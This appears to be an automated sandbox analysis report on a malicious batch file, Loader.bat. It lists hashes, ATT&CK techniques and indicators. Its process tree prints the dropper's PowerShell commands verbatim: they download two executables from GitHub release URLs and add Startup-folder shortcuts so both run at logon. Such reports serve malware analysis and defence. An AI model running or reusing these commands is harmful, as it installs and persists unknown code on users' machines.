504e74f223f13c996066449c7f279eb32a61f80f80c9e87d31cfdca6fee7373f

General

Target

Loader.bat
Size

1KB
MD5

84d66a793f6d1f8fb1f4726ee735f55e
SHA1

db7f145a9685a3911f02bbc61a02546da06e68d9
SHA256

504e74f223f13c996066449c7f279eb32a61f80f80c9e87d31cfdca6fee7373f
SHA512

ab172682c693815c9bb902f395632785e0b24981f05eef61244c4311aabb79f94a4af9e1dc978ab2f3caa5b4db1b5cdd2ad896a61d4d8bb747750d702f1b907e

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3032	powershell.exe
3012	powershell.exe
2960	powershell.exe
2772	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3032	powershell.exe
2960	powershell.exe
3012	powershell.exe
2772	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 3032	2336	cmd.exe	30
PID 2336 wrote to memory of 3032	2336	cmd.exe	30
PID 2336 wrote to memory of 3032	2336	cmd.exe	30
PID 2336 wrote to memory of 2960	2336	cmd.exe	31
PID 2336 wrote to memory of 2960	2336	cmd.exe	31
PID 2336 wrote to memory of 2960	2336	cmd.exe	31
PID 2336 wrote to memory of 3012	2336	cmd.exe	32
PID 2336 wrote to memory of 3012	2336	cmd.exe	32
PID 2336 wrote to memory of 3012	2336	cmd.exe	32
PID 2336 wrote to memory of 2772	2336	cmd.exe	33
PID 2336 wrote to memory of 2772	2336	cmd.exe	33
PID 2336 wrote to memory of 2772	2336	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/dsafffffffff/releases/download/dasa/saloader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
113a091dc88834254bb120599f903fc3

SHA1
78b4cb835b4a86dd0c5fc19184b07601764fcb40

SHA256
d2b5be4ecfd7e5dcae148243132836c99f69c3106b4236e256c5657e45fda5a6

SHA512
50167646a898a24576130ecf3c535558f124239a9b33540e0081f28c6df84dc8644edd12616a04efb67c2431c7e14ca3f238c6b4a2b0001034cff87c2b624804

Download Submit
memory/2960-18-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2960-19-0x0000000002710000-0x0000000002718000-memory.dmp

Filesize
32KB

Download
memory/3032-4-0x000007FEF5DFE000-0x000007FEF5DFF000-memory.dmp

Filesize
4KB

Download
memory/3032-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/3032-6-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download
memory/3032-8-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download
memory/3032-7-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/3032-10-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download
memory/3032-9-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download
memory/3032-11-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download
memory/3032-12-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing